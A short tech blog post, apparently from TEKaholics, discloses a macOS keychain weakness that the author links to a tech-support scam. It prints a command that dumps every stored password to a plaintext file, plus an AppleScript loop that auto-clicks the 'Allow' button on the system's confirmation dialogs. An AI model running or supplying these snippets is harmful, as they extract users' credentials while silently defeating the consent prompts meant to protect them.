This Security Flaw Can Display All Keychain Passwords in Plain Text

Just a few days ago, a client of mine has learned the hard way to not let a scam company take control of your computer to provide you support. What I have learned out of this experience has shocked me to the core of my being.

There is a method in OS X that allows people to export the keychain without sudo privileges or system dialogs. This will put it in a text file with the username and password being displayed in plain text.

As of writing of this small article, it is currently working on 10.10 and 10.11.5.

The command follows:

security dump-keychain -d login.keychain > keychain.txt

The way around system dialogs, by adding:

tell application "System Events"
    repeat while exists (processes where name is "SecurityAgent")
        tell process "SecurityAgent"
            click button "Allow" of group 1 of window 1
        end tell
        delay 0.2
    end repeat
end tell

All unauthorized users can gain access to all usernames and passwords that were ever stored in the keychain and iCloud.

Apple is known for priding itself on their level of security, but this has been a known method for over two years now. I can strongly say that this is a major security flaw -- they should at least force people to confirm their password. The Keychain dialogue requires you to enter your password when you want to show password for an entry.

Shouldn't a command within the terminal require the same levels of security?


Written by

Traven

Traven is the Lead Author and Editor of TEKaholics. He loves to talk about programming and security topics. His mindset follows security-first programming. He strives to spread knowledge, updates, and his weirdness to everyone who is willing to listen.